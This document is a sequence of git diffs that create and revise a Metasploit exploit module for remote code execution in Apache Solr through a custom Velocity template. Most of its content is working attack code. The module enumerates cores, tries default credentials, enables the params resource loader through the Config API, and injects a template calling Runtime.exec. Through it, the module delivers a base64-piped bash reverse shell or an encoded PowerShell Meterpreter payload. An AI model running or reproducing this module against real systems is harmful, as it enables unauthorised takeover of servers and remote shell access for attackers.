+    # the next 2 lines cause problems with CmdStager, so it's only used when needed (during the check for PowerShell existence)
+    if opts['winenv_check']
+      template += <<~VELOCITY
+        #set($out=$ex.getInputStream())
+        #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+      VELOCITY
+    end
 
     # execute the exploit...
     solr_get(
@@ -389,6 +393,21 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  # some prep work has to be done to work around the limitations of Java's Runtime.exec()
+  def execute_cmdstager_begin
+    if @target_platform.include? "Windows"
+      @cmd_list.each do |command|
+        command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
+        print_status(command)
+      end
+    else
+      @cmd_list.each do |command|
+        command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
+        print_status(command)
+      end
+    end
+  end
+
   # make sending requests easier
   def solr_get(opts = {})
     send_request_cgi_opts = {
@@ -397,7 +416,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'           => opts['uri']
     }
 
-    # @auth_string defaults to "", meaning no authentication is necessary
+    # @auth_string defaults to "" if no authentication is necessary
+    # otherwise, authentication is required
     if opts['auth'] != ""
       send_request_cgi_opts.store('authorization', opts['auth'])
     end

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -1,0 +1,354 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This exploit sample shows how an exploit module could be written to exploit
+# a bug in an arbitrary TCP server.
+#
+###
+require 'json'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  #
+  # This exploit affects TCP servers, so we use the TCP client mixin.
+  # See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the
+  # vulnerable target program.
+  #
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name'           => 'Apache Solr Remote Code Execution via Velocity Template',
+        'Description'    => %q(
+          This module exploits a vulnerability in Apache Solr <= 8.2.0 which allows remote code execution via a custom
+          Velocity template.
+
+          From the Tenable advisory:
+          An attacker could target a vulnerable Apache Solr instance by first identifying a list
+          of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
+          HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
+          Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
+          template parameter in a specially crafted Solr request, leading to RCE. This vulnerability currently does not
+          have a CVE number assigned.
+
+          Payload defaults to x86 Meterpreter reverse TCP for Windows and plain old reverse TCP shell for Linux.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            's00py',
+            'jas502n', # exploit code on Github
+            'AleWong', # ExploitDB contribution, and exploit code on Github
+            'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+          ],
+        'References'     =>
+            [
+              [ 'EDB', '47572' ],
+              [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
+              [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
+              [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
+              [ 'URL', 'https://github.com/jas502n/solr_rce'],
+              [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
+            #[ 'CVE', 'CVE-1111-2222'],
+            ],
+        'Platform'       => ['unix', 'win'],
+        'Targets'        =>
+            [
+              [
+                'Unix-based',
+                {
+                  'DefaultOptions' => { 'PAYLOAD'  => 'cmd/unix/reverse_bash' },
+                  'Arch'     => ARCH_CMD,
+                  'Platform' => 'Unix',
+                }
+              ],
+              [
+                'x86/x64 Windows',
+                {
+                  'DefaultOptions' => { 'PAYLOAD'  => 'windows/meterpreter/reverse_tcp' },
+                  'Arch'     => [ARCH_X86, ARCH_X64],
+                  'Platform' => 'Windows',
+                }
+              ]
+            ],
+        'DisclosureDate' => "Oct 29 2019",
+        'Privileged'     => false
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8983),
+        OptString.new('USERNAME', [false, 'Solr username (default is solr)', '']),
+        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', ''])
+      ]
+    )
+  end
+
+  # are we just checking? or are we exploiting?
+  @vuln_check = true
+  # if we are just checking, we only need one core to be exploitable
+  @core_name = ""
+  # OS specific stuff
+  @target_platform = ""
+  @target_arch = ""
+  # has the switch been flicked?
+  @params_resource_loader_enabled = false
+  # if authentication is used
+  @auth_string = ""
+
+  # check for vulnerability existence
+  def check
+    # see if authentication is required for the specified Solr instance
+    auth_check = send_request_cgi({
+                 'method'  => 'GET',
+                 'headers' => { 'Connection' => 'Keep-Alive' },
+                 'uri'     => '/solr/'
+      })
+    # if return code is not 200, then the Solr instance definitely requires authentication
+    unless auth_check.code == 200
+      print_warning("Authentication required for #{peer}!")
+      vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
+      # no creds provided means we cannot reliably check exploitability
+      if datastore['USERNAME'] == nil and datastore['PASSWORD'] == nil
+        print_error("Credentials not provided, skipping credentialed check...")
+        return CheckCode::Unknown
+      # otherwise, attempt authentication
+      else
+        print_status("Attempting authentication for #{peer}...")
+        attempt_auth = send_request_cgi({
+                       'method'  => 'GET',
+                       'headers' => {
+                                      'Connection'    => 'Keep-Alive',
+                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                                    },
+                       'uri'     => '/solr/'
+          })
+
+        unless attempt_auth.code == 200
+          print_status("Authentication failed!")
+          return CheckCode::Unknown
+        end
+
+        @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        # TODO: add creds to MSF database
+      end
+    end
+
+    # if successful authentication happens, user the authorization header for the rest of the check
+    if @auth_string == ""
+      @headers = {
+        'Connection'   => 'Keep-Alive',
+      }
+    else
+      @headers = {
+        'Connection'      => 'Keep-Alive',
+        'Authorization'   => @auth_string.to_s
+      }
+    end
+
+    # send a GET request to get Solr and system details
+    ver = send_request_cgi({
+          'method'  => 'GET',
+          'headers' => @headers,
+          'uri'     => '/solr/admin/info/system?wt=json'
+      })
+
+    # can't connect? that's an automatic failure
+    unless ver
+      vprint_error("Connection failed!")
+      return CheckCode::Unknown
+    end
+
+    # convert to JSON
+    ver_json = ver.get_json_document
+    # get Solr version
+    @solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
+    print_status("Found Apache Solr #{@solr_version}")
+    # get OS version details
+    @target_platform = ver_json['system']['name']
+    @target_arch = ver_json['system']['arch']
+    @target_osver = ver_json['system']['version']
+    print_status("OS version is #{@target_platform} #{@target_arch} #{@target_osver}")
+    # uname doesn't show up for Windows, so run a check for that.
+    if ver_json['system']['uname']
+      @uname = ver_json['system']['uname'].strip
+      # print uname only when verbose
+      vprint_status("Full uname is '#{@uname}'")
+    end
+
+    # the vulnerability is only present in Solr versions <= 8.3.0
+    unless @solr_version <= Gem::Version.new('8.3.0')
+      return CheckCode::Safe
+    end
+
+    # enumerate cores
+    cores = send_request_cgi({
+            'method'  => 'GET',
+            'headers' => @headers,
+            'uri'     => '/solr/admin/cores?wt=json'
+      })
+
+    # can't connect? that's yet another automatic failure
+    unless cores
+      vprint_error("Could not enumerate cores!")
+      return CheckCode::Unknown
+    end
+
+    # convert to JSON yet again
+    cores_json = cores.get_json_document
+    @cores_list = Array.new()
+    # get the core names
+    cores_json['status'].keys.each do |core_name|
+      @cores_list.push(core_name)
+    end
+
+    # no cores? that means nothing to exploit.
+    if @cores_list.length == 0
+      print_error("No cores found, nothing to exploit!")
+      return CheckCode::Safe
+    end
+
+    # got cores? tell the operator which cores were found
+    print_good("Found core(s): #{@cores_list.join(", ")}")
+    # for each core, attempt to get the config as JSON
+    @cores_list.each do |core_name|
+      core_config = send_request_cgi({
+                    'method'  => 'GET',
+                    'headers' => @headers,
+                    'uri'     => "/solr/#{core_name}/config?wt=json"
+        })
+
+      # can't retrieve configuration for that core? go next
+      unless core_config
+        vprint_error("Could not retrieve configuration for core #{core_name}!")
+        next
+      end
+
+      # convert to JSON... for the third time
+      core_config_json = core_config.get_json_document
+      # if the core configuration does not include the Velocity Response Writer, go check the next core
+      unless core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
+        vprint_error("Velocity Response Writer not found in core #{core_name}")
+        next
+      end
+      vprint_good("Found Velocity Response Writer in use by core #{core_name}")
+
+      # if params.resource.loader.enabled is false, we need to set it to true before exploitation
+      if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
+        print_good("params.resource.loader.enabled for core '#{core_name}' is set to true.")
+        @params_resource_loader_enabled = true
+      else
+        vprint_warning("params.resource.loader.enabled for core #{core_name} is set to false.")
+      end
+
+      # if we are preparing to exploit, the first core that fits the criteria is selected.
+      # whether or not the core has params.resource.loader.enabled is not a factor
+      # as it can be modified during the exploit
+      if @vuln_check == false
+        @core_name = core_name
+        return CheckCode::Vulnerable
+      end
+    end
+
+    return CheckCode::Vulnerable
+  end
+
+  # the exploit method
+  def exploit
+    # we are prepping to check and exploit, not prepping to check only
+    @vuln_check = false
+    unless [CheckCode::Vulnerable].include? check
+      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
+    end
+
+    # the new config in JSON format
+    @enable_params_resource_loader = {
+      "update-queryresponsewriter": {
+        "startup": "lazy",
+        "name": "velocity",
+        "class": "solr.VelocityResponseWriter",
+        "template.base.dir": "",
+        "solr.resource.loader.enabled": "true",
+        "params.resource.loader.enabled": "true"
+      }
+    }.to_json
+
+    # if params.resource.loader.enabled is not true
+    if @params_resource_loader_enabled != true
+      print_status("params.resource.loader.enabled is not true, setting it to true...")
+      update_config = send_request_cgi({
+                      'method'        => 'POST',
+                      'headers'       => @headers,
+                      'ctype'         => 'application/json;charset=utf-8',
+                      'encode_params' => false,
+                      'uri'           => "/solr/#{@core_name}/config",
+                      'data'          => @enable_params_resource_loader
+        })
+
+      # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
+      unless update_config.code == 200
+        fail_with(Failure::UnexpectedReply, 'Unable to update config, exploit failed!')
+      end
+
+      print_good("params.resource.loader.enabled is now set to true!")
+    end
+
+    # automatic targeting to prevent hiccups
+    if @target_platform.include? "Windows"
+      # if target is wrong, warn and exit before doing anything
+      unless targets[datastore['TARGET']].name.include? "Windows"
+        fail_with(Failure::NoTarget, 'Target is found to be Windows, please select the proper target!')
+      end
+
+      # exploiting for Windows relies heavily on PowerShell, so go find it first
+      # TODO: will CmdStager work if PowerShell not found?
+      psh_enum = execute_command("where%20powershell", {'core_name' => @core_name})
+      # abort the exploit if PowerShell was not found
+      unless (/powershell/i) =~ psh_enum.body.to_s
+        fail_with(Failure::NoTarget, "PowerShell not found, aborting exploit attempt!")
+      end
+
+      vprint_good("PowerShell found at #{psh_enum.body.to_s.split('0  ')[1].strip}")
+      # generate PowerShell command, encode with base64, and remove comspec
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+      # prepare to exploit...
+      execute_command(Rex::Text.uri_encode(psh_command), {'core_name' => @core_name})
+    # assume unix otherwise, and continue with default payload
+    else
+      # base32 encoded payload is the safest, without any sort of special characters except "="
+      b32_payload = Rex::Text.encode_base32(generate_payload().raw)
+      # on Unix, works best with bash, got some serious beef with plain old sh
+      bash_payload = "bash%20-c%20{echo,#{b32_payload}}|{base32,-d}|{bash,-i}"
+      # prepare to exploit...
+      execute_command(bash_payload, {'core_name' => @core_name})
+    end
+  end
+
+  # sic 'em, bois!
+  def execute_command(cmd, opts = {})
+    # custom template which enables command execution.
+    @custom_template = "%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27PAYLOAD_HERE%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
+    # substitute the payload into the template...
+    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
+    # execute the exploit...
+    send_request_cgi({
+                         'method'  => 'GET',
+                         'uri'     => "/solr/#{opts['core_name']}/select?q=1&wt=velocity&v.template=custom&v.template.custom=#{@weaponized_template}",
+                         'headers' => @headers,
+      })
+  end
+end

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -15,11 +15,7 @@ require 'msf/core/exploit/powershell'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  #
-  # This exploit affects TCP servers, so we use the TCP client mixin.
-  # See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the
-  # vulnerable target program.
-  #
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpClient
 
@@ -27,10 +23,6 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        # The Name should be just like the line of a Git commit - software name,
-        # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
-        # some search optimization so people can actually find the module.
-        # We encourage consistency between module name and file name.
         'Name'           => 'Apache Solr Remote Code Execution via Velocity Template',
         'Description'    => %q(
           This module exploits a vulnerability in Apache Solr <= 8.2.0 which allows remote code execution via a custom
@@ -49,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
-            's00py',
+            's00py', # Discovery and PoC
             'jas502n', # exploit code on Github
             'AleWong', # ExploitDB contribution, and exploit code on Github
             'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
@@ -92,8 +84,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8983),
-        OptString.new('USERNAME', [false, 'Solr username (default is solr)', '']),
-        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', ''])
+        OptString.new('USERNAME', [false, 'Solr username (default is solr)', 'solr']),
+        OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', 'SolrRocks'])
       ]
     )
   end
@@ -118,6 +110,12 @@ class MetasploitModule < Msf::Exploit::Remote
                  'headers' => { 'Connection' => 'Keep-Alive' },
                  'uri'     => '/solr/'
       })
+
+    # successfully connected?
+    unless auth_check
+      return CheckCode::Unknown('Connection failed')
+    end
+
     # if return code is not 200, then the Solr instance definitely requires authentication
     unless auth_check.code == 200
       print_warning("Authentication required for #{peer}!")
@@ -128,6 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
         return CheckCode::Unknown
       # otherwise, attempt authentication
       else
+
         print_status("Attempting authentication for #{peer}...")
         attempt_auth = send_request_cgi({
                        'method'  => 'GET',
@@ -165,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ver = send_request_cgi({
           'method'  => 'GET',
           'headers' => @headers,
-          'uri'     => '/solr/admin/info/system?wt=json'
+          'uri'     => '/solr/admin/info/system'
       })
 
     # can't connect? that's an automatic failure
@@ -200,7 +199,8 @@ class MetasploitModule < Msf::Exploit::Remote
     cores = send_request_cgi({
             'method'  => 'GET',
             'headers' => @headers,
-            'uri'     => '/solr/admin/cores?wt=json'
+            'uri'     => '/solr/admin/cores'
+
       })
 
     # can't connect? that's yet another automatic failure
@@ -230,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
       core_config = send_request_cgi({
                     'method'  => 'GET',
                     'headers' => @headers,
-                    'uri'     => "/solr/#{core_name}/config?wt=json"
+                    'uri'     => "/solr/#{core_name}/config"
         })
 
       # can't retrieve configuration for that core? go next
@@ -317,7 +317,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # exploiting for Windows relies heavily on PowerShell, so go find it first
       # TODO: will CmdStager work if PowerShell not found?
-      psh_enum = execute_command("where%20powershell", {'core_name' => @core_name})
+      psh_enum = execute_command("where powershell", {'core_name' => @core_name})
       # abort the exploit if PowerShell was not found
       unless (/powershell/i) =~ psh_enum.body.to_s
         fail_with(Failure::NoTarget, "PowerShell not found, aborting exploit attempt!")
@@ -327,7 +327,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # generate PowerShell command, encode with base64, and remove comspec
       psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
       # prepare to exploit...
-      execute_command(Rex::Text.uri_encode(psh_command), {'core_name' => @core_name})
+      execute_command(psh_command, {'core_name' => @core_name})
     end
 
     # or unix-based?
@@ -337,10 +337,10 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoTarget, 'Target is found to be Unix-based, please select the proper target!')
       end
 
-      # base32 encoded payload is the safest, without any sort of special characters except "="
-      b32_payload = Rex::Text.encode_base32(generate_payload().raw)
-      # on Unix, works best with bash, got some serious beef with plain old sh
-      bash_payload = "bash%20-c%20{echo,#{b32_payload}}|{base32,-d}|{bash,-i}"
+      # base64 payload has to be URI encoded
+      b64_payload = Rex::Text.encode_base64(generate_payload().raw)
+      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
+      bash_payload = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
       # prepare to exploit...
       execute_command(bash_payload, {'core_name' => @core_name})
     end
@@ -348,15 +348,31 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
-    # custom template which enables command execution.
-    @custom_template = "%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27PAYLOAD_HERE%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
-    # substitute the payload into the template...
-    @weaponized_template = @custom_template.gsub("PAYLOAD_HERE", cmd)
+    # cmd must be uri-encoded, or the exploit fials
+    uri_encoded_cmd = Rex::Text.uri_encode(cmd)
+    # custom template which enables command execution
+    template = URI.encode('#set($x="")+' \
+    '#set($rt=$x.class.forName("java.lang.Runtime"))+' \
+    '#set($chr=$x.class.forName("java.lang.Character"))+' \
+    '#set($str=$x.class.forName("java.lang.String"))+' \
+    '#set($ex=$rt.getRuntime().exec("PAYLOAD_HERE"))+' \
+    '$ex.waitFor()+#set($out=$ex.getInputStream())+' \
+    '#foreach($i+in+[1..$out.available()])' \
+      '$str.valueOf($chr.toChars($out.read()))' \
+    '#end').gsub("PAYLOAD_HERE", uri_encoded_cmd)
+
     # execute the exploit...
     send_request_cgi({
-                         'method'  => 'GET',
-                         'uri'     => "/solr/#{opts['core_name']}/select?q=1&wt=velocity&v.template=custom&v.template.custom=#{@weaponized_template}",
-                         'headers' => @headers,
+         'method'        => 'GET',
+         'encode_params' => false,
+         'uri'           => "/solr/#{opts['core_name']}/select",
+         'headers'       => @headers,
+         'vars_get'      => {
+             'q'                 => '1',
+             'wt'                => 'velocity',
+             'v.template'        => 'custom',
+             'v.template.custom' => template
+         }
       })
   end
 end

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -78,7 +78,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(8983),
         OptString.new('USERNAME', [false, 'Solr username', 'solr']),
-        OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks'])
+        OptString.new('PASSWORD', [false, 'Solr password', 'SolrRocks']),
+        OptString.new('TARGETURI', [false, 'Path to Solr', '/solr/'])
       ]
     )
   end
@@ -388,10 +389,12 @@ class MetasploitModule < Msf::Exploit::Remote
       '$str.valueOf($chr.toChars($out.read()))' \
     '#end')
 
+    print_status(target_uri.path)
+
     # execute the exploit...
     send_request_cgi({
          'method'        => 'GET',
-         'uri'           => normalize_uri(target_uri.path, '/solr/', opts['core_name'].to_s, 'select'),
+         'uri'           => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
          'headers'       => @headers,
          'vars_get'      => {
              'q'                 => '1',

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name'           => 'Apache Solr Remote Code Execution via Velocity Template',
         'Description'    => %q(
           This module exploits a vulnerability in Apache Solr <= 8.2.0 which allows remote code execution via a custom
-          Velocity template.
+          Velocity template. Currently, this module only supports Solr basic authentication.
 
           From the Tenable advisory:
           An attacker could target a vulnerable Apache Solr instance by first identifying a list
@@ -84,26 +84,18 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  # are we just checking? or are we exploiting?
-  @vuln_check = true
   # if we are going to exploit, we only need one core to be exploitable
-  @core_name = ""
+  @vuln_core = ""
   # OS specific stuff
   @target_platform = ""
   @target_arch = ""
-  # has the switch been flicked?
-  @params_resource_loader_enabled = false
   # if authentication is used
   @auth_string = ""
 
   # check for vulnerability existence
   def check
     # see if authentication is required for the specified Solr instance
-    auth_check = send_request_cgi({
-                 'method'  => 'GET',
-                 'headers' => { 'Connection' => 'Keep-Alive' },
-                 'uri'     => '/solr/'
-      })
+    auth_check = solr_get({'uri' => normalize_uri(target_uri.path), 'auth' => @auth_string})
 
     # successfully connected?
     unless auth_check
@@ -113,54 +105,33 @@ class MetasploitModule < Msf::Exploit::Remote
     unless auth_check.code == 200
       print_warning("Authentication required for #{peer}!")
       vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
-      # no creds provided means we cannot reliably check exploitability
+      # if authentication is required and creds are not provided, we cannot reliably check exploitability
       if datastore['USERNAME'] == "" and datastore['PASSWORD'] == ""
         return CheckCode::Unknown("Credentials not provided, skipping credentialed check...")
-      # otherwise, attempt authentication
-      else
-        print_status("Attempting authentication for #{peer}...")
-        attempt_auth = send_request_cgi({
-                       'method'  => 'GET',
-                       'headers' => {
-                                      'Connection'    => 'Keep-Alive',
-                                      'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
-                                    },
-                       'uri'     => '/solr/'
-          })
-
-        # successfully connected?
-        unless attempt_auth
-          return CheckCode::Unknown("Connection failed!")
-        end
-        # if the return code is not 200, then authentication definitely failed
-        unless attempt_auth.code == 200
-          return CheckCode::Unknown('Authentication failed!')
-        end
-
-        print_good("Authentication succeeded!")
-        @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
-        # TODO: add creds to MSF database
       end
-    end
+      # otherwise, try the given creds
+      print_status("Attempting authentication for #{peer}...")
+      attempt_auth = solr_get({
+                       'uri'  => normalize_uri(target_uri.path),
+                       'auth' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+                     })
 
-    # if successful authentication happens, user the authorization header for the rest of the check
-    if @auth_string == ""
-      @headers = {
-        'Connection'   => 'Keep-Alive',
-      }
-    else
-      @headers = {
-        'Connection'      => 'Keep-Alive',
-        'Authorization'   => @auth_string.to_s
-      }
+      # successfully connected?
+      unless attempt_auth
+        return CheckCode::Unknown("Connection failed!")
+      end
+      # if the return code is not 200, then authentication definitely failed
+      unless attempt_auth.code == 200
+        return CheckCode::Unknown("Authentication failed!")
+      end
+
+      print_good("Authentication succeeded!")
+      @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      # TODO: add creds to MSF database
     end
 
     # send a GET request to get Solr and system details
-    ver = send_request_cgi({
-          'method'  => 'GET',
-          'headers' => @headers,
-          'uri'     => '/solr/admin/info/system'
-      })
+    ver = solr_get({'uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string})
 
     # can't connect? that's an automatic failure
     unless ver
@@ -170,32 +141,26 @@ class MetasploitModule < Msf::Exploit::Remote
     # convert to JSON
     ver_json = ver.get_json_document
     # get Solr version
-    @solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
-    print_status("Found Apache Solr #{@solr_version}")
+    solr_version = Gem::Version.new(ver_json['lucene']['solr-spec-version'])
+    print_status("Found Apache Solr #{solr_version}")
     # get OS version details
     @target_platform = ver_json['system']['name']
     @target_arch = ver_json['system']['arch']
-    @target_osver = ver_json['system']['version']
-    print_status("OS version is #{@target_platform} #{@target_arch} #{@target_osver}")
-    # uname doesn't show up for Windows, so run a check for that.
+    target_osver = ver_json['system']['version']
+    print_status("OS version is #{@target_platform} #{@target_arch} #{target_osver}")
+    # uname doesn't show up for Windows, so run a check for that
     if ver_json['system']['uname']
-      @uname = ver_json['system']['uname'].strip
       # print uname only when verbose
-      vprint_status("Full uname is '#{@uname}'")
+      vprint_status("Full uname is '#{ver_json['system']['uname'].strip}'")
     end
 
     # the vulnerability is only present in Solr versions <= 8.3.0
-    unless @solr_version <= Gem::Version.new('8.3.0')
+    unless solr_version <= Gem::Version.new('8.3.0')
       return CheckCode::Safe("Running version of Solr is not vulnerable!")
     end
 
     # enumerate cores
-    cores = send_request_cgi({
-            'method'  => 'GET',
-            'headers' => @headers,
-            'uri'     => '/solr/admin/cores'
-
-      })
+    cores = solr_get({'uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string})
 
     # can't connect? that's yet another automatic failure
     unless cores
@@ -205,85 +170,79 @@ class MetasploitModule < Msf::Exploit::Remote
     # convert to JSON yet again
     cores_json = cores.get_json_document
     # draw up an array of all the cores
-    @cores_list = Array.new()
-    # if we are checking, we better have an array of all the exploitable cores
-    @possibly_vulnerable_cores = Array.new()
+    cores_list = Array.new()
     # get the core names
     cores_json['status'].keys.each do |core_name|
-      @cores_list.push(core_name)
+      cores_list.push(core_name)
     end
 
     # no cores? that means nothing to exploit.
-    if @cores_list.length == 0
+    if cores_list.length == 0
       return CheckCode::Safe("No cores found, nothing to exploit!")
     end
 
     # got cores? tell the operator which cores were found
-    print_status("Found core(s): #{@cores_list.join(", ")}")
-    # for each core, attempt to get the config as JSON
-    @cores_list.each do |core_name|
-      core_config = send_request_cgi({
-                    'method'  => 'GET',
-                    'headers' => @headers,
-                    'uri'     => "/solr/#{core_name}/config"
-        })
+    print_status("Found core(s): #{cores_list.join(", ")}")
+    possibly_vulnerable_cores = {}
+
+    cores_list.each do |core|
+      # for each core, attempt to get config
+      core_config = solr_get({'uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string})
 
       # can't retrieve configuration for that core? go next
       unless core_config
-        print_error("Could not retrieve configuration for core #{core_name}!")
+        print_error("Could not retrieve configuration for core #{core}!")
         next
       end
 
-      # convert to JSON... for the third time
+      # convert to JSON
       core_config_json = core_config.get_json_document
-      # if the core configuration does not include the Velocity Response Writer, go check the next core
+      # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable
       unless core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
-        print_error("Velocity Response Writer not found in core #{core_name}")
+        vprint_error("Velocity Response Writer not found in core #{core}")
         next
       else
-        print_good("Found Velocity Response Writer in use by core #{core_name}")
-        @possibly_vulnerable_cores.push(core_name)
-      end
-
-      # if params.resource.loader.enabled is false, we need to set it to true before exploitation
-      if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
-        print_good("params.resource.loader.enabled for core '#{core_name}' is set to true.")
-        @params_resource_loader_enabled = true
-      else
-        print_warning("params.resource.loader.enabled for core #{core_name} is set to false.")
-      end
-
-      # if we exploiting, the first core that fits the criteria is selected.
-      # whether or not the core has params.resource.loader.enabled is not a factor as
-      # we can attempt to modify it during the exploit
-      if @vuln_check == false
-        unless @possibly_vulnerable_cores == nil
-          @core_name = @possibly_vulnerable_cores[0]
-          return CheckCode::Vulnerable
+        vprint_good("Found Velocity Response Writer in use by core #{core}")
+        if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
+          vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.")
+          possibly_vulnerable_cores.store(core, true)
         else
-          return CheckCode::Safe
+          # if params.resource.loader.enabled is false, we need to set it to true before exploitation
+          print_warning("params.resource.loader.enabled for core #{core} is set to false.")
+          possibly_vulnerable_cores.store(core, false)
         end
       end
     end
 
-    # for checking, look at the array of vulnerable cores
-    if @possibly_vulnerable_cores == nil
+    # look at the array of possibly vulnerable cores
+    if possibly_vulnerable_cores.empty?
       return CheckCode::Safe "No cores are vulnerable!"
     else
+      # if possible, pick a core that already has params.resource.loader.enabled set to true
+      possibly_vulnerable_cores.each do |core|
+        if core[1] == true
+          @vuln_core = core
+          break
+        end
+      end
+      # otherwise, just pick the first one
+      if @vuln_core.to_s == ""
+        @vuln_core = possibly_vulnerable_cores.first
+      end
       return CheckCode::Vulnerable
     end
   end
 
   # the exploit method
   def exploit
-    # we are prepping to check and exploit, not prepping to check only
-    @vuln_check = false
     unless [CheckCode::Vulnerable].include? check
       fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
     end
 
+    print_status("Targeting core '#{@vuln_core[0]}'")
+
     # the new config in JSON format
-    @enable_params_resource_loader = {
+    enable_params_resource_loader = {
       "update-queryresponsewriter": {
         "startup": "lazy",
         "name": "velocity",
@@ -294,16 +253,17 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     }.to_json
 
-    # if params.resource.loader.enabled is not true
-    if @params_resource_loader_enabled != true
+    # if params.resource.loader.enabled for that core is not true
+    if @vuln_core[1] != true
       print_status("params.resource.loader.enabled is not true, setting it to true...")
